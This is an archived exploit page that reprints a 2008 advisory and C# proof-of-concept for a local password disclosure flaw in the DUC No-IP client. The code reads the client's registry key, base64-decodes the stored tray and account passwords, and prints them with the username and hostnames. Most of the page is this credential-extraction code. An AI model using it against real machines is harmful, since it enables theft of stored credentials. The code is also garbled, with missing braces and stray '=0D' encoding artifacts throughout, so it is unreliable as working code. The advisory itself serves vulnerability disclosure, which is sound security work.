AOH :: HP Unsorted D :: BX3514.HTM

DUC NO-IP Local Password Information Disclosure Vulnerability

DUC NO-IP Local Password Information Disclosure Vulnerability
DUC NO-IP Local Password Information Disclosure Vulnerability

/* =0D
 * DUC NO-IP Local Password Information Disclosure=0D
 * Author(s): Charalambous Glafkos=0D
 *            George Nicolaou=0D
 * Date: March 11, 2008=0D
* Site: 
* Mail: 
 * Synopsis: DUC NO-IP is prone to an information disclosure vulnerability due to a design error.=0D
 *           Attackers can exploit this issue to obtain sensitive information including tray password,=0D
 *           web username, password and hostnames that may lead to further attacks.=0D
 *            =0D
 * Note: Vendor has been notified long time ago confirming a design error.=0D
* Vendor site: 
 *           =0D
using System;=0D
using System.Text;=0D
using System.IO;=0D
using Microsoft.Win32;=0D
namespace getRegistryValue=0D
    class getValue=0D
        static void Main()=0D
            getValue details = new getValue();=0D
            String strDUC = details.getDUC();=0D
            Console.WriteLine("\nDUC NO-IP Password Decoder v1.2");=0D
            Console.WriteLine("Author: Charalambous Glafkos");=0D
            FileInfo t = new FileInfo("no-ip.txt");=0D
            StreamWriter Tex = t.CreateText();=0D
            Console.WriteLine("\nThe file named no-ip.txt is created\n");=0D
        private string getDUC()=0D
            RegistryKey ducKey = Registry.LocalMachine;=0D
ducKey = ducKey.OpenSubKey(@"SOFTWARE\Vitalwerks\DUC", false);=0D 
            String TrayPassword = DecodeBytes(ducKey.GetValue("TrayPassword").ToString());=0D
            String Username = ducKey.GetValue("Username").ToString();=0D
            String Password = DecodeBytes(ducKey.GetValue("Password").ToString());=0D
            String Hostnames = ducKey.GetValue("Hosts").ToString();=0D
            String strDUC = "\nTrayPassword: " + TrayPassword=0D
                + "\nUsername: " + Username=0D
                + "\nPassword: " + Password=0D
                + "\nHostnames: " + Hostnames;=0D
            return strDUC;=0D
        public static string DecodeBytes(String encryptedData) =0D
        Byte[] toDecodeByte = Convert.FromBase64String(encryptedData);=0D
        System.Text.UTF8Encoding encoder = new System.Text.UTF8Encoding();=0D
        System.Text.Decoder utf8Decode = encoder.GetDecoder();=0D
        int charCount = utf8Decode.GetCharCount(toDecodeByte, 0, toDecodeByte.Length);=0D
        Char[] decodedChar = new char[charCount];=0D
        utf8Decode.GetChars(toDecodeByte, 0, toDecodeByte.Length, decodedChar, 0);=0D
        String result = new String(decodedChar);=0D
        return (new string(decodedChar));=0D
  }   =0D

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an email address, please forward it with full headers to